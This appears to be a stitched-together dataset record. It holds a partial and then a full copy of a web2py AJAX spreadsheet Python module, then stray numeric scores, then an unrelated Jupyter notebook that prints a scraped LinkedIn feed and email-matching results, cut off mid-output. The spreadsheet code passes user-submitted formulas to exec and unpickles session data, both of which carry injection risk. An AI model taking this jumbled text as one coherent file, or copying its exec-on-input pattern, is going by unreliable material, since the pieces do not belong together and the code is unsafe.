onfocus="ajax('%s/focus',['%s'],':eval');"
onblur="ajax('%s/blur',['%s'],':eval');" %s/>
""" % (self.name,self.name,self.computed_value,self.size,
self.url,self.name,self.url,self.name,self.url,self.name,
(self.readonly and 'readonly ') or '')
def __repr__(self):
return '%s:%s' % (self.name,self.computed_value)
class Sheet:
regex=re.compile('(?<!\w)[a-zA-Z_]\w*')
re_strings = re.compile(r'(?P<name>'
+ r"[uU]?[rR]?'''([^']+|'{1,2}(?!'))*'''|"
+ r"'([^'\\]|\\.)*'|"
+ r'"""([^"]|"{1,2}(?!"))*"""|'
+ r'"([^"\\]|\\.)*")', re.DOTALL)
def dumps(self):
dump=pickle.dumps(self)
return dump
@staticmethod
def loads(data):
sheet=pickle.loads(data)
return sheet
def process(self,request):
"""
call this in action that creates table, it will handle ajax callbacks
"""
cell=request.vars.keys()[0]
if request.args(0)=='focus':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].value))
value = request.vars[cell]
self[cell]=value
if request.args(0)=='blur':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].computed_value))
elif request.args(0)=='keyup':
jquery=''
for other_key in self.modified:
if other_key!=cell:
jquery+="jQuery('#%s').val('%s');" % \
(other_key,quote(self[other_key].computed_value))
return jquery
def __init__(self,rows,cols,url='.'):
self.rows=rows
self.cols=cols
self.url=url
self.nodes={}
self.error='ERROR: %(error)s'
self.allowed_keywords=['for','in','if','else','and','or','not',
'i','j','k','x','y','z','sum']
self.environment={}
[self.cell('r%sc%s'%(k/cols,k%cols),'0.0') for k in xrange(rows*cols)]
exec('from math import *',{},self.environment)
def delete_from(self,other_list):
indices = [k for (k,node) in enumerate(other_list) if k==node]
if indices: del other_list[indices[0]]
def changed(self,node,changed_nodes=[]):
for other_node in node.outcoming:
if not other_node in changed_nodes:
changed_nodes.append(other_node)
self.changed(other_node,changed_nodes)
return changed_nodes
def define(self,name,obj):
self.environment[name]=obj
def cell(self,key,value,readonly=False,active=True,onchange=None):
"""
key is the name of the cell
value is the initial value of the cell. It can be a formula "=1+3"
a cell is active if it evaluates formuls
"""
if not self.regex.match(key): raise SyntaxError, "Invalid cell name"
node=Node(key,value,self.url,readonly,active,onchange)
self.nodes[key]=node
self[key]=value
def __setitem__(self,key,value):
node=self.nodes[key]
node.value=value
if value[:1]=='=' and node.active:
# clear all edges involving current node
for other_node in node.incoming:
del other_node.outcoming[node]
node.incoming.clear()
# build new edges
command = self.re_strings.sub("''",value[1:])
node.locked=False
for match in self.regex.finditer(command):
other_key=match.group()
if other_key==key:
self.computed_value=self.error % dict(error='cycle')
self.modified={}
break
if other_key in self.nodes:
other_node=self.nodes[other_key]
other_node.outcoming[node]=True
node.incoming[other_node]=True
elif not other_key in self.allowed_keywords and \
not other_key in self.environment:
node.locked=True
node.computed_value=self.error % dict(error='invalid keyword: '+other_key)
self.modified={}
break
self.compute(node)
else:
try:
node.computed_value=int(node.value)
except:
try:
node.computed_value=float(node.value)
except:
node.computed_value=node.value
self.environment[key]=node.computed_value
if node.onchange: node.onchange()
self.modified=self.iterate(node)
def compute(self,node):
if node.value[:1]=='=' and not node.locked:
try:
exec('__value__='+node.value[1:],{},self.environment)
node.computed_value=self.environment['__value__']
del self.environment['__value__']
except Exception,e:
node.computed_value=self.error % dict(error=str(e))
self.environment[node.name]=node.computed_value
if node.onchange: node.onchange()
def iterate(self,node):
output={node.name:node.computed_value}
changed_nodes = self.changed(node)
while changed_nodes:
ok=False
set_changed_nodes=set(changed_nodes)
for (k,other_node) in enumerate(changed_nodes):
#print other_node, changed_nodes
if not set(other_node.incoming.keys()).intersection(set_changed_nodes):
#print 'ok'
self.compute(other_node)
output[other_node.name]=other_node.computed_value
#print other_node
del changed_nodes[k]
ok=True
break
if not ok: return {}
return output
def __getitem__(self,key):
return self.nodes[key]
if __name__=='__main__':
s=Sheet(0,0)
s.cell('a',value="2")
s.cell('b',value="=sin(a)")
s.cell('c',value="=cos(a)**2+b*b")
print s['c'].computed_value | web2py-appliances-master/AjaxSpreadsheet/modules/sheet.py | import re
import pickle
import copy
def quote(text):
return str(text).replace('\\','\\\\').replace("'","\\'")
class Node:
"""
Example::
# controller
from gluon.contrib.spreadsheet import Sheet
def index():
if request.args:
sheet = Sheet.loads(session.psheet)
jquery=sheet.process(request)
session.psheet=sheet.dumps()
return jquery
else:
sheet=Sheet(10,10,URL(r=request))
#sheet = Sheet.loads(session.psheet)
sheet.cell('r0c3',value='=r0c0+r0c1+r0c2',readonly=True)
session.psheet = sheet.dumps()
return dict(sheet=sheet)
# view
{{extend 'layout.html'}}
<form>
<table spacing="0" border="0" padding="0">
{{for r in xrange(sheet.rows):}}
<tr>
{{for c in xrange(sheet.cols):}}
<td>
{{=XML(sheet.nodes['r%sc%s'%(r,c)].xml())}}
</td>
{{pass}}
</tr>
{{pass}}
</table>
</form>
"""
def __init__(self,name,value,url='.',readonly=False,active=True,onchange=None):
self.url=url
self.name=name
self.value=value
self.computed_value=''
self.incoming={}
self.outcoming={}
self.readonly=readonly
self.active=active
self.onchange=onchange
self.size=6
self.locked=False
def xml(self):
return """<input name="%s" id="%s" value="%s" size="%s"
onkeyup="ajax('%s/keyup',['%s'],':eval');"
onfocus="ajax('%s/focus',['%s'],':eval');"
onblur="ajax('%s/blur',['%s'],':eval');" %s/>
""" % (self.name,self.name,self.computed_value,self.size,
self.url,self.name,self.url,self.name,self.url,self.name,
(self.readonly and 'readonly ') or '')
def __repr__(self):
return '%s:%s' % (self.name,self.computed_value)
class Sheet:
regex=re.compile('(?<!\w)[a-zA-Z_]\w*')
re_strings = re.compile(r'(?P<name>'
+ r"[uU]?[rR]?'''([^']+|'{1,2}(?!'))*'''|"
+ r"'([^'\\]|\\.)*'|"
+ r'"""([^"]|"{1,2}(?!"))*"""|'
+ r'"([^"\\]|\\.)*")', re.DOTALL)
def dumps(self):
dump=pickle.dumps(self)
return dump
@staticmethod
def loads(data):
sheet=pickle.loads(data)
return sheet
def process(self,request):
"""
call this in action that creates table, it will handle ajax callbacks
"""
cell=request.vars.keys()[0]
if request.args(0)=='focus':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].value))
value = request.vars[cell]
self[cell]=value
if request.args(0)=='blur':
return "jQuery('#%s').val('%s');" % (cell,quote(self[cell].computed_value))
elif request.args(0)=='keyup':
jquery=''
for other_key in self.modified:
if other_key!=cell:
jquery+="jQuery('#%s').val('%s');" % \
(other_key,quote(self[other_key].computed_value))
return jquery
def __init__(self,rows,cols,url='.'):
self.rows=rows
self.cols=cols
self.url=url
self.nodes={}
self.error='ERROR: %(error)s'
self.allowed_keywords=['for','in','if','else','and','or','not',
'i','j','k','x','y','z','sum']
self.environment={}
[self.cell('r%sc%s'%(k/cols,k%cols),'0.0') for k in xrange(rows*cols)]
exec('from math import *',{},self.environment)
def delete_from(self,other_list):
indices = [k for (k,node) in enumerate(other_list) if k==node]
if indices: del other_list[indices[0]]
def changed(self,node,changed_nodes=[]):
for other_node in node.outcoming:
if not other_node in changed_nodes:
changed_nodes.append(other_node)
self.changed(other_node,changed_nodes)
return changed_nodes
def define(self,name,obj):
self.environment[name]=obj
def cell(self,key,value,readonly=False,active=True,onchange=None):
"""
key is the name of the cell
value is the initial value of the cell. It can be a formula "=1+3"
a cell is active if it evaluates formuls
"""
if not self.regex.match(key): raise SyntaxError, "Invalid cell name"
node=Node(key,value,self.url,readonly,active,onchange)
self.nodes[key]=node
self[key]=value
def __setitem__(self,key,value):
node=self.nodes[key]
node.value=value
if value[:1]=='=' and node.active:
# clear all edges involving current node
for other_node in node.incoming:
del other_node.outcoming[node]
node.incoming.clear()
# build new edges
command = self.re_strings.sub("''",value[1:])
node.locked=False
for match in self.regex.finditer(command):
other_key=match.group()
if other_key==key:
self.computed_value=self.error % dict(error='cycle')
self.modified={}
break
if other_key in self.nodes:
other_node=self.nodes[other_key]
other_node.outcoming[node]=True
node.incoming[other_node]=True
elif not other_key in self.allowed_keywords and \
not other_key in self.environment:
node.locked=True
node.computed_value=self.error % dict(error='invalid keyword: '+other_key)
self.modified={}
break
self.compute(node)
else:
try:
node.computed_value=int(node.value)
except:
try:
node.computed_value=float(node.value)
except:
node.computed_value=node.value
self.environment[key]=node.computed_value
if node.onchange: node.onchange()
self.modified=self.iterate(node)
def compute(self,node):
if node.value[:1]=='=' and not node.locked:
try:
exec('__value__='+node.value[1:],{},self.environment)
node.computed_value=self.environment['__value__']
del self.environment['__value__']
except Exception,e:
node.computed_value=self.error % dict(error=str(e))
self.environment[node.name]=node.computed_value
if node.onchange: node.onchange()
def iterate(self,node):
output={node.name:node.computed_value}
changed_nodes = self.changed(node)
while changed_nodes:
ok=False
set_changed_nodes=set(changed_nodes)
for (k,other_node) in enumerate(changed_nodes):
#print other_node, changed_nodes
if not set(other_node.incoming.keys()).intersection(set_changed_nodes):
#print 'ok'
self.compute(other_node)
output[other_node.name]=other_node.computed_value
#print other_node
del changed_nodes[k]
ok=True
break
if not ok: return {}
return output
def __getitem__(self,key):
return self.nodes[key]
if __name__=='__main__':
s=Sheet(0,0)
s.cell('a',value="2")
s.cell('b',value="=sin(a)")
s.cell('c',value="=cos(a)**2+b*b")
print s['c'].computed_value | 0.291989 | 0.120879 |
{
"cells": [
{
"cell_type": "code",
"execution_count": 52,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import re\n",
"import json"
]
},
{
"cell_type": "code",
"execution_count": 37,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"0 notifications total\n",
"\n",
"Skip to search\n",
"\n",
"Skip to main content\n",
"\n",
"Close jump menu\n",
"Search\n",
"Primary Navigation\n",
"Home\n",
"My Network\n",
"<EMAIL> \n",
"Messaging\n",
"13\n",
"13 new notifications\n",
"Notifications\n",
"<NAME>\n",
"Me\n",
"\n",
"Work\n",
"Advertise\n",
"Photo of <NAME>\n",
"<NAME>\n",
"Senior Data Engineer\n",
"\n",
"Who viewed your profile\n",
"238\n",
"Views of your post\n",
"567\n",
"Access exclusive tools & insights\n",
"Retry Premium Free\n",
" My items\n",
"\n",
"Fort Services logo\n",
"Fort Services\n",
"Page notifications\n",
"5\n",
"Page visitors\n",
"1\n",
"See visitor analytics\n",
"Recent\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&A\n",
"Oracle Retail Analytics Professional\n",
"Use it or Lose it: Data Science Best Practices to Leverage AI/ML\n",
"GroupsSee all Groups\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&AShow more Show more Groups\n",
"EventsSee all Events Contact: <EMAIL> \n",
"\n",
"\n",
"Havard Business School - Startup Demo DaySee allSee all Events\n",
"Followed HashtagsSee all Followed Hashtags\n",
"Discover more\n",
"Visit profile for Rabindra Kharel\n",
"\n",
"Start a post\n",
"\n",
"Photo\n",
"\n",
"Video\n",
"Event\n",
"\n",
"Write article\n",
"\n",
"Sort by:\n",
"Top\n",
"Feed Updates\n",
"Feed post number 1\n",
"kshitij’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"Anup NepalStatus is reachable\n",
"Anup Nepal\n",
"• 1st\n",
"Digital Transformation\n",
"7h • 7 hours ago\n",
"I’m happy to share that I’m starting a new position as Retail Optimization Lead at Tango Energy!\n",
"\n",
"Starting a New Position\n",
"likecelebrate\n",
"27\n",
"<NAME> and 26 others\n",
"8 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"<EMAIL> \n",
" 1st degree connection1st\n",
"Software Engineer\n",
"2h\n",
"Congrats bro!\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 2\n",
"<NAME> follows Hevo Data\n",
"\n",
"Hevo Data\n",
"Hevo Data\n",
"33,425 followers\n",
"Promoted\n",
"There is an easier way to perform Redshift ETL.\n",
"\n",
"Find out how you can save time on engineering and research to set-up Redshift ETL with our cheatsheet.\n",
"…see more\n",
"\n",
"Free guide to Redshift ETL\n",
"hevodata.com\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"40\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Profile images for several LinkedIn members\n",
"Profile images for several LinkedIn membersProfile images for several LinkedIn members\n",
"<NAME> and <NAME> like this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 1st\n",
"Software Engineer\n",
"2d • 2 days ago\n",
"Just finished the course “Communicating with Confidence” by <NAME>! Check it out: https://lnkd.in/ejtCuJMK #publicspeaking #wellness.\n",
"\n",
"Certificate of Completion\n",
"linkedin.com • 1 min read\n",
"like\n",
"10\n",
"<NAME> and 9 others\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 1\n",
"Aayush AdhikariStatus is online\n",
"<NAME>\n",
"• 1st\n",
"Machine Learning Data Scientist at DeepMind Creations Pvt Ltd\n",
"8h • Edited • 8 hours ago\n",
"\n",
"Hello all our company is opening for PAID INTERNSHIP on Flutter. If you are interested plz send your CV at <EMAIL>\n",
"\n",
"#flutter\n",
"#flutterdeveloper\n",
"#ml\n",
"#ai\n",
"…see more\n",
"likesupport\n",
"12\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"Jobs recommended for you\n",
"\n",
"View job: Senior Data Engineer\n",
"\n",
"Recruiting from Scratch\n",
"Senior Data Engineer\n",
"Recruiting from Scratch\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 month ago\n",
"View job: Senior Data Engineer - Scala/AWS\n",
"\n",
"Jobot\n",
"Senior Data Engineer - Scala/AWS\n",
"Jobot\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 week ago • Easy Apply\n",
"View job: Senior Big Data Engineer\n",
"\n",
"Emonics LLC\n",
"Senior Big Data Engineer\n",
"Emonics LLC\n",
"Vancouver, British Columbia, Canada\n",
"send email to <EMAIL> \n",
"\n",
"3 days ago • Easy Apply\n",
"\n",
"See moreSee more\n",
"Feed post number 3\n",
"Santosh’s profile photo\n",
"Santosh Pandey likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"☀️ Solving for Future of Work | People Engagement\n",
"3d • 3 days ago\n",
"Follow\n",
"Hypocrisy 101\n",
"\n",
"\"How soon can you join? We need somebody who can join within a week.\"\n",
"\n",
"\"You'll need to serve 3 months of notice period, we can't do anything about it.\"\n",
"\n",
"If the employee is so important to you that you need 3 months to replace them, you should've treated them well in the first place - and they probably wouldn't have left.\n",
"\n",
"A smooth exit process is underrated.\n",
"\n",
"Do it well, and the employee might consider returning in the future.\n",
"\n",
"Make it complicated, and the employee will ensure that none of their friends/acquaintances ends up joining your company ever again. 🙃\n",
"\n",
"Curious, how was your exit process in your previous org?\n",
"\n",
"#noticeperiod #offboarding #employeeexperience\n",
"…see more\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likecelebratesupport agent <EMAIL> \n",
"1,420\n",
"<NAME> and 1,419 others\n",
"87 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"<NAME>, <NAME> and 136 other connections follow The British College, Kathmandu\n",
"\n",
"The British College, Kathmandu\n",
"The British College, Kathmandu\n",
"4,662 followers\n",
"Promoted\n",
"TBC is proud to announce the second series of the TBC Distinguished Guest Lecture Series with Prof <NAME> & Dr <NAME>. The topic of the session: \"Innovation, Development & Covid 19: Post Pandemic Context for Nepal.\"\n",
"RSVP: https://bit.ly/33jYiV1\n",
"…see more\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"\n",
"like\n",
"25\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 5\n",
"Congratulate <NAME> on their work anniversary\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 1st\n",
"CEO and Founder at SoftNEP\n",
"1d1 day ago\n",
"Celebrating 17 years at SoftNEP Pvt Ltd\n",
"celebratelike\n",
"2\n",
"\n",
"Congrats Sunil\n",
"\n",
"Time flies!\n",
"\n",
"Kudos to you\n",
"\n",
"Wow!\n",
"\n",
"What an achievement!\n",
"\n",
"Great work!\n",
"\n",
"Wow, 17 years already?\n",
"\n",
"Scroll right\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Feed post number 6\n",
"Lekhanath’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Director, Eurest\n",
"3d • 3 days ago\n",
"I am looking to fill the following jobs:\n",
"<NAME>\n",
"<NAME>\n",
"Prep Cook\n",
"\n",
"Monday-Friday\n",
"<NAME>\n",
"PM me for details\n",
"…see more\n",
"likelove\n",
"166\n",
"132 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lekhanath BhandariStatus is reachable\n",
"<NAME>\n",
" 1st degree connection1st\n",
"sous chef at fazlani nature nest\n",
"1d\n",
"Interested for sous chef\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 7\n",
"Bibek’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 2nd\n",
"CEO, Innovation and Growth at Trinity Consulting - Founder, InfluencerActive, the World's First B2B Influencer Marketplace\n",
"12h • 12 hours ago\n",
"Follow\n",
"Turn your plants into pets!\n",
"\n",
"Play\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:00/Duration 0:45\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likeloveinsightful\n",
"9,044\n",
"<NAME> and 9,043 others\n",
"257 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 1\n",
"Larange’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Research Scientist at Google DeepMind • Advisor at AlphaSignal.ai\n",
"1d • Edited • 1 day ago\n",
"Follow\n",
"Hi all!\n",
"We're currently looking for a part time (4 hours/week) Computer Science PhD or Masters student to help us at https://alphasignal.ai\n",
"\n",
"A few criteria:\n",
"-Must be between timezones GMT+5 (India) to GMT+9 (Japan).\n",
"-Published at least one research paper in Machine Learning.\n",
"-Has some familiarity with Pytorch, Tensorflow.\n",
"-Knows the difference between RNN, CNN, LSTM, GANs.\n",
"-Familiarity with Deep Learning terms.\n",
"-Knows about Meta AI, Deepmind, Google AI, OpenAI and other big players.\n",
"\n",
"That's it!\n",
"If you know a student who fits the role send it my way :)\n",
"\n",
"It's definitely a resume-booster.\n",
"…see more\n",
"likesupportcurious\n",
"432\n",
"<NAME> and 431 others\n",
"102 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"<NAME> and <NAME> follow Spot by NetApp\n",
"\n",
"Spot by NetApp\n",
"Spot by NetApp\n",
"11,440 followers\n",
"Promoted\n",
"Download our free digital guide to Microsoft Azure. Learn best practices for architecting and managing efficient, scalable cloud infrastructure built to accelerate your business\n",
"…see more\n",
"\n",
"Getting Started with Azure Cloud Infrastructure – Get the PDF Guide\n",
"get.spot.io\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"30\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Everest’s profile photo\n",
"Everest K.C. likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"System Administrator\n",
"6h • Edited • 6 hours ago\n",
"<NAME> is an extremely experienced DevOps engineer. He has an intelligent teaching method, Start teaching from the very basics to taking to a stage where you build real-world solutions and debug challenges. The designed labs were great and worked as expected without a hitch. Thanks, owlocular to give me this certificate.\n",
"…see more\n",
"Your document has finished loading\n",
"likecelebratelove\n",
"6\n",
"Everest K.C. and 5 others\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"Lalit’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Commissioning Manager - Process | Commissioning Expert | Troubleshooting Expert for O&M|\n",
"20h • 20 hours ago\n",
"Riyadh AldhaleaiStatus is reachable\n",
"Riy<NAME>\n",
"• 3rd+\n",
"Manager -Manpower Services at AlMansoori Specialized Engineering\n",
"3d • 3 days ago\n",
"Follow\n",
"small test for your focus\n",
"whats is the Number inside the circle?\n",
"\n",
"Image previewActivate to view larger image\n",
"like\n",
"4\n",
"18 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lalit SharmaStatus is reachable\n",
"L<NAME>\n",
" 1st degree connection1st\n",
"Team Leader cum Senior Highway Engineer\n",
"1h\n",
"45283\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 5\n",
"Sammeer’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>, Ph.D\n",
"<NAME>, Ph.D\n",
"• 2nd\n",
"Social Media Marketing|Please click FOLLOW button for the latest development in Civil Engineering || 230K+ Followers ||\n",
"23h • 23 hours ago\n",
"Follow\n",
" What Causes Breakdowns in Traffic Flow?\n",
"\n",
"The layman's definition of congestion is \"too many cars trying to use a highway at the same time\". Transportation engineers formalize this idea as capacity—the ability to move vehicles past a point over a given span of time. When the capacity of a highway section is exceeded, traffic flow breaks down, speeds drop, and vehicles crowd together. These actions cause traffic to back up behind the disruption.\n",
"\n",
"Basically, there are three types of traffic flow behavior that will cause traffic flow to break down:\n",
"\n",
"1- \"Bunching\" of vehicles as a result of reduced speed.\n",
"2- Intended Interruption to Traffic Flow.\n",
"3- Vehicle Merging Maneuvers. \n",
"\n",
"With all this information, I believe this dog got the concept and found the solution better than me as a Highway engineer ;)\n",
"\n",
"If you found the content informative, you may Follow me by <NAME>, Ph.D for more!\n",
"\n",
"Video Credit: IG @ earthdixe\n",
".......................................................................\n",
"All rights and credits are reserved to the respective owner(s). If you are the main copyright owner rather than the one mentioned here of this content, contact me to claim credit or content removal.\n",
"\n",
"Check out #mehrtashsoltani for educational and practical content in civil engineering!\n",
"…see more\n",
"\n",
"Pause\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:04/Duration 0:18\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likelovecelebrate\n",
"3,781\n",
"<NAME> and 3,780 others\n",
"178 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 6\n",
"Supermetrics\n",
"Supermetrics\n",
"13,205 followers\n",
"Promoted\n",
"\n",
"Supermetrics has been listed on G2 as the highest rated marketing data pipeline company of 2022.\n",
"\n",
"Over 17,000 companies already use Supermetrics to streamline marketing reports.\n",
"\n",
"Join our happy customers and start your free trial today!\n",
"…see more\n",
"\n",
"Start your free trial today\n",
"supermetrics.comRegister. View Sponsored Content\n",
"Register\n",
"likelove\n",
"61\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 7\n",
"Samundra’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Here to write. If it goes viral, it's not because of me. It's because it's true.\n",
"3d • 3 days ago\n",
"Follow\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likelovecelebrate\n",
"68,665\n",
"<NAME> and 68,664 others\n",
"1,154 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Show more results\n",
"Add to your feed\n",
"\n",
"National Association of REALTORS®;<EMAIL> \n",
"National Association of REALTORS®\n",
"Company • Real Estate\n",
"\n",
"Follow\n",
"<NAME>\n",
"<NAME>\n",
"Bestselling Author | Host of the Women & Money Podcast | Co-Founder of SecureSave\n",
"\n",
"Follow\n",
"National Association of Home Builders\n",
"National Association of Home Builders\n",
"Company • Construction\n",
"\n",
"Follow\n",
"View all recommendations \n",
"\n",
"About\n",
"Accessibility\n",
"Help Center\n",
"\n",
"Privacy & Terms \n",
"Ad Choices\n",
"Advertising\n",
"\n",
"Business Services \n",
"Get the LinkedIn app\n",
"More\n",
" LinkedIn Corporation © 2022 <EMAIL> \n",
"<NAME>Status is online\n",
"MessagingYou are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n",
"\n",
"Compose message\n",
"\n",
"You are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n"
]
}
],
"source": [
"\n",
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"print(f.read())"
]
},
{
"cell_type": "code",
"execution_count": 67,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
